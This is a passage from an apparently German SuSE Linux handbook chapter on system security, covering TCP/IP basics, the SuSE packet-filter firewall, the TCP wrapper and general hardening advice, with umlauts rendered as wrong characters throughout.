Jedoch auch hier sollte man sich ⁿberlegen, ob man wirklich Dienste wie
telnet, shell und login ben÷tigt. Diese Dienste haben nΣmlich den Nachteil,
469
18. Sicherheit ist Vertrauenssache
dass ein Angreifer sΣmtliche Daten einschlie▀lich des Passworts bei solchen
Verbindungen mitlesen kann. Dazu sind nicht einmal besondere Kenntnisse
notwendig, da es Programme gibt, die einem diese Arbeit abnehmen. Insbe-
sondere sollte man auf keinen Fall ein direkten Remote-Login als `root'
zulassen. Aus diesem Grund sei noch einmal auf die Secure Shell" (Paket
ssh) hingewiesen. Bei Einsatz der ssh wird die gesamte ▄bertragung ver-
schlⁿsselt, auch das eingegebene Passwort (Verschlⁿsselung).
Das SuSE Firewall-Paket
Fragen zum SuSE Paketfilterfirewall werden nicht durch den Installations-
support beantwortet.
Der SuSE Paketfilterfirewall (Paket firewals, Serie sec (Sicherheitsrele-
vante Software)) wird ⁿber die Datei /etc/rc.firewall aktiviert und
konfiguriert. Die einzelnen EintrΣge sind in der Datei selber dokumentiert
und kommentiert. Um auch AnfΣngern den Einstieg zu erleichtern, folgen
nun einige Grundlagen-ErlΣuterungen und Hinweise zum Einsatz der SuSE
Paketfilterfirewall.
Die bei der Kommunikation ⁿber das Internet eingesetzte Protokollfamilie ist
das Internetprotokoll, das unter dem Begriff TCP/IP" bekannt ist. TCP/IP
steht fⁿr Transmission Control Protocol und Internet Protocol. TCP/IP ist
heutzutage ⁿber fast alle Hardware-, Betriebssystem- und Netzplattformen
hinweg verfⁿgbar. Es wurde vom amerikanischen Verteidigungsministerium
(United States Department of Defence; DoD) entwickelt und zum ersten Mal
1978 der ╓ffentlichkeit vorgestellt.
Ein TCP/IP-Netz ⁿbertrΣgt Daten zwischen verschiedenen Computersyste-
men, indem es die Daten zu Paketen zusammenfasst und die Pakete ⁿbertrΣgt.
Jedes Paket beginnt mit einem Header, der verschiedene Steuerinformationen,
wie z. B. die Adresse des Zielcomputers, enthΣlt. Nach diesem Header folgen
dann die zu ⁿbertragenden Daten. Wenn z. B. eine Datei von einem Compu-
ter auf einen anderen Computer ⁿber das Netz transportiert werden soll, wird
der Inhalt dieser Datei in eine Serie von Paketen umgewandelt. Diese Pakete
werden dann zum Zielcomputer geschickt.
Die fehlerfreie ▄bertragung der Pakete stellt das Transmission Control Proto-
col (TCP) sicher. Es sorgt z. B. dafⁿr, dass die Pakete in der richtigen Reihen-
folge beim EmpfΣnger ankommen. TCP bildet die Transportschicht und mel-
det Fehler, die nicht behebbar sind, an das darⁿberliegende IP weiter. Ein wei-
teres Tranportschichtprotokoll der Familie ist UDP. Bei UDP wurde auf die
Sicherstellung der fehlerfreien ▄bertragung verzichtet, wodurch die ▄bertra-
gung schneller als bei TCP verlΣuft. Allerdings muss bei der Verwendung von
UDP anderweitig (durch die Anwendung) sichergestellt werden, dass ▄ber-
tragungsfehler erkannt und korrigiert werden.
Eine IP-Adresse (IP Version 4) ist ein 32Bit-Wert. Um IP-Adressen besser
lesbar zu machen, werden sie in dezimalen 8Bit-Portionen, durch Punkte ge-
trennt, geschrieben (z. B. 192.168.0.20). Damit ein Computer zur glei-
chen Zeit mehrere Verbindungen bedienen kann und um diese Verbindun-
gen voneinander unterscheiden zu k÷nnen, findet die Kommunikation ⁿber
470
18.2. Tools
sog. Ports (0 bis 65535) statt. Diesen Ports werden Verbindungen zugeord-
net, d. h. im Header eines TCP- oder UDP-Pakets werden neben der Adresse
des sendenden Computers (Quelladresse) und des Zielcomputers (Zieladres-
se) auch der Quellport und der Zielport eingetragen. Ein Teil der Ports 0
bis 65535 ist per Definition fⁿr bestimmte Dienste vorgesehen (siehe auch
/etc/services).
Der TCP-Port 23 ist beispielsweise der Port fⁿr Telnetverbindungen. Eine
weitere Festlegung betrifft die Ports 0 bis 1023 (TCP und UDP). Sie sind
die sog. privilegierten Ports. Auf diesen Ports dⁿrfen vertrauenswⁿrdige Pro-
gramme, die zum Teil mit Systemverwalterprivilegien (`root'-Rechte) aus-
gefⁿhrt werden mⁿssen, ihre Dienste anbieten (siehe /etc/services).
Die Ports 1024 bis 65535 werden als nichtprivilegierte Ports bezeichnet.
Der Unterschied kann am etwas vereinfachten Beispiel einer Dateiⁿbertra-
gung mit ftp verdeutlicht werden. Ein FTP-Server bietet seine Dienste auf
TCP-Port 21 an. Wird ein FTP-Client auf dem Computer mit der IP-Adresse
192.168.3.5 (Client) mit dem Kommando
tux@erde:/home/tux > ftp 192.168.3.16
gestartet, dann baut der Client eine TCP-Verbindung zum Port 21 des Compu-
ters mit der IP-Adresse 192.168.3.16 (Server) auf. Auf Port 21 antwortet
der FTP-Server und wickelt die Benutzeridentifizierung (Loginnamen- und
Passwortabfrage) ab. Auch die FTP-Kommandos, die der Benutzer nach der
Anmeldung eingibt, werden ⁿber diese Verbindung ⁿbertragen. Sollen Daten
vom Server zum Client ⁿbertragen werden, (nach Eingabe des ls-Befehls
oder des get-Befehls) baut der Server von sich aus eine Verbindung zu ei-
nem nichtprivilegierten Port des Clients auf. ▄ber diese Verbindung werden
dann die eigentlichen Daten ⁿbertragen.
TCP/IP wurde fⁿr sehr gro▀e Netze entworfen und beinhaltet deshalb Me-
chanismen zur Strukturierung eines Netzes. Der gesamte 32Bit-breite Adress-
raum kann in Subnets" aufgeteilt werden. Die Subnet-Bildung erfolgt, indem
eine Anzahl Bits (von links beginnend) zur Netzadresse eines Subnets er-
klΣrt werden. Beim Subnet mit der Adresse 192.168.3.0 bilden die ersten
24 Bits der Adresse die Netzadresse. Durch die Subnetmask" (Netzmaske)
wird gekennzeichnet, wie viele Bits einer Adresse die Netzadresse bilden. Die
Subnetmask 255.255.255.0 legt beispielsweise fest, dass der Computer
mit der Adresse 192.168.3.5 im Subnet mit der Adresse 192.168.3.0
zu finden ist.
Subnets innerhalb eines gro▀en Netzes werden meist durch Router verbun-
den. Router sind entweder spezialisierte GerΣte oder entsprechend ausgerⁿs-
tete Computer die dafⁿr sorgen, dass Pakete den richtigen Weg ans Ziel fin-
den. Das Gegenstⁿck zur Subnetmask ist die sog. Broadcast-Adresse. ▄ber
die Broadcast-Adresse sind alle Computer eines Subnet erreichbar. Beispiel:
Alle Computer im Netz 192.168.3.0 sind ⁿber die Broadcast-Adresse
192.168.3.255 erreichbar.
Ist der Anschluss an das Internet erfolgt, ist der Computer zu einem Teil des
weltweiten Internet geworden. Jedesmal wenn die Verbindung zum Provider
aktiviert wird, ist er aus dem Internet erreichbar. Jetzt mⁿssen Ma▀nahmen
471
18. Sicherheit ist Vertrauenssache
getroffen werden, um unerlaubte Zugriffe aus dem Internet zu unterbinden.
Diese Aufgabe ⁿbernimmt der SuSE Paketfilterfirewall.
Paketfilter sind Network Level Firewalls. Sie entscheiden grundsΣtzlich auf
Basis von Quelladressen, Zieladressen und Ports in einzelnen IP-Paketen.
Ein einfacher Router oder der SuSE Paketfilterfirewall sind traditionel-
le Network Level Firewalls. Da sie nicht intelligent genug sind festzu-
stellen, welche Bedeutung der Inhalt eines IP-Pakets hat und wo es tat-
sΣchlich herkommt, bieten sie keinen umfassenden Schutz gegen Angrif-
fe. Moderne Network Level Firewalls (z. B., SINUS Firewall I fⁿr Linux,
http://www.sinusfirewall.org) sind h÷herentwickelt und sam-
meln interne Informationen ⁿber den Status der Verbindungen, die ⁿber
sie laufen, den Inhalt von Datenstr÷men usw. Application Level Firewalls
(z. B. TIS Firewall Toolkit) dagegen sind normalerweise Computer, auf de-
nen Proxy-Server laufen, die den Datenverkehr, der ⁿber sie lΣuft, sorgfΣl-
tig protokollieren und ⁿberprⁿfen. Da die Proxy-Server Programme sind,
die auf dem Firewall laufen, sind sie ideal fⁿr Protokollierungs- und Zu-
griffschutzmechanismen geeignet.
Wo soll der SuSE Paketfilterfirewall eingesetzt werden? Fⁿr Netze mit
erh÷htem Schutzbedarf ¡ streng genommen ist das ⁿberall, wo personenbezo-
gene Daten gespeichert werden ¡ sind Application Level Firewalls" bedingt
durch ihr Funktionsprinzip immer noch erste Wahl. Fⁿr solche Netze bietet
der SuSE Paketfilterfirewall keinen ausreichenden Schutz.
Der SuSE Paketfilterfirewall ist fⁿr den Schutz des privaten PC zuhause, des
Mininetzes zuhause oder einer Workstation innerhalb eines vertrauenswⁿrdi-
gen Netzes gedacht.
Fⁿr den Schutz von Firmennetzen sollten Sie den SuSE Paketfilterfirewall nur
einsetzen, wenn Sie genau wissen, was Sie tun (siehe Literaturliste).
Fⁿr den Aufbau und die Pflege von Firewalls ist tiefgehendes Wissen ⁿber
Netzwerke und die verwendeten Netzwerkprotokolle zwingend erforderlich.
Eine grafische OberflΣche oder eine vorgefertigte Konfiguration wie der SuSE
Paketfilterfirewall k÷nnen dieses Wissen letztendlich nicht ersetzen.
Die Dokumentation zur SuSE Paketfilterfirewall finden sie unter /usr/
doc/packages/firewals und /etc/rc.firewall.
Wer sich mit dem Thema Firewall auseinander setzen will, dem seien die
folgenden Quellen zum Studieren und Experimentieren empfohlen.
Das Firewallhandbuch fⁿr Linux 2.0 und 2.2 von Guido Stepken bietet von
detaillierten technischen Informationen ⁿber die Beschreibung von typischen
Schwachstellen und Fehlern fast alles was man wissen muss um mit Li-
nux einen sicheren Firewall aufzubauen. Das Firewallhandbuch fⁿr Linux ist
Pflichtlektⁿre und nur online verfⁿgbar (http://www.little-idiot.
de/firewall/). Das Freefireprojekt ist ein guter Anlaufpunkt fⁿr alle die
sich fⁿr Firewalls auf Basis freier Software interessieren (http://sites.
inka.de/sites/lina/freefire-l/).
472
18.3. Sicherheit bei SuSE Linux
Der TCP-Wrapper
Der TCP-Wrapper (tcpd) erlaubt es, den Zugriff auf bestimmte Dienste ge-
zielt fⁿr einzelne Netze oder IP-Adressen freizuschalten. Der tcpd ist be-
reits in SuSE Linux integriert, wie man in Datei 18.2.2 auf Seite 469 und in
/etc/inetd.conf an der 6. Spalte erkennen kann. Das Konzept ist ganz
einfach: Der tcpd ruft die eigentlichen Dienste auf und kontrolliert vorher, ob
der Client dazu berechtigt ist.
Diese Zugriffskontrolle geschieht ⁿber die beiden Dateien /etc/hosts.
allow und /etc/hosts.deny.
* Ein Zugriff wird gewΣhrt, wenn eine Kombination aus Client und Dienst
in der Datei /etc/hosts.allow zutrifft.
* ─quivalent dazu wird ein Zugriff abgewiesen, wenn eine solche Kombi-
nation in der Datei /etc/hosts.deny zutrifft.
* Befindet sich weder in der einen noch in der anderen Datei eine solche
Regel, wird der Zugriff gewΣhrt.
Sobald eine Regel zutrifft, wird diese genommen. Das bedeutet, wenn in
/etc/hosts.allow z. B. ein Zugriff auf den Telnet-Port erlaubt wird,
wird dieser gewΣhrt, auch wenn dieser in /etc/hosts.deny gesperrt
ist.
In der Manual-Page von hosts_access (man 5 hosts_access) wird
die Syntax dieser Dateien beschrieben.
Eine Alternative zur Kombination TCP-Wrapper/inetd stellt der xinetd dar
(Paket xinetd, Serie n (Netzwerk-Support)). Er vereint die FunktionalitΣt
von inetd und tcpd. Der Nachteil ist jedoch die InkompatibilitΣt der Konfigu-
rationsdateien zwischen inetd und xinetd.
Es kann nur einer der beiden Internet Super-Server" gestartet werden. Sie
mⁿssen sich also fⁿr einen von beiden entscheiden.
In der Serie sec (Sicherheitsrelevante Software) befinden sich weitere Pro-
gramme, die beim Aufbau eines sicheren Systems helfen. St÷bern Sie einfach
durch die dort liegende Pakete.
18.3 Sicherheit bei SuSE Linux
SuSE bietet folgende Dienstleistungen fⁿr die Bereitstellung einer m÷glichst
sicherheitsorientierten Distribution an:
Zwei Mailinglisten stehen fⁿr alle zur Verfⁿgung:
* suse-security-announce ¡ enthΣlt SuSE-Benachrichtigungen zu
Sicherheitsproblemen.
* suse-security ¡ enthΣlt die Benachrichtigungen und ist fⁿr ÷ffentli-
che Diskussionen offen.
473
18. Sicherheit ist Vertrauenssache
Zum Eintragen auf eine der beiden Mailinglisten reicht es, eine leere E-Mail
an suse-security-subscribe@suse.com oder
suse-security-announce-subscribe@suse.com zu senden.
Zentrale Meldung von neuen Sicherheitsproblemen:
Wenn Sie ein neues Sicherheitsproblem finden (bitte prⁿfen Sie vorher
die zur Verfⁿgung stehenden Updates), senden Sie bitte eine E-Mail an
security@suse.de mit der Beschreibung des Problems. Wir kⁿmmern uns
umgehend darum. Sie k÷nnen die Daten mit Paket pgp verschlⁿsseln. Unser
public pgp key7 liegt unter http://www.suse.de/security
zum Download bereit (Verschlⁿsselung).
18.4 Allgemeine Hinweise
1. Der Benutzer `root' sollte lediglich fⁿr administrative Arbeiten einge-
loggt sein. Fⁿr die tΣgliche Arbeit am Rechner sollte ein Benutzeraccount
angelegt werden.
2. Vermeiden Sie die Benutzung von telnet, rlogin oder gar rsh.
3. Verwenden Sie stattdessen ssh, wenn remote gearbeitet werden muss.
4. Deaktivieren Sie alle Netzwerkdienste, die nicht ben÷tigt werden.
5. Halten Sie sicherheitsrelevante Pakete up to date, wie z. B. Paket bind,
Paket sendmail und Paket ssh.
6. Entfernen Sie suid- und sgid-Bits von allen Dateien im System, die nicht
unbedingt fⁿr normale Benutzer zum Arbeiten notwendig sind.
7. Die Logdateien sollten regelmΣ▀ig ⁿberwacht werden.
7 PGP Key fingerprint = 73 5F 2E 99 DF DB 94 C4 8F 5A A3 AE AF 22 F2 D5
474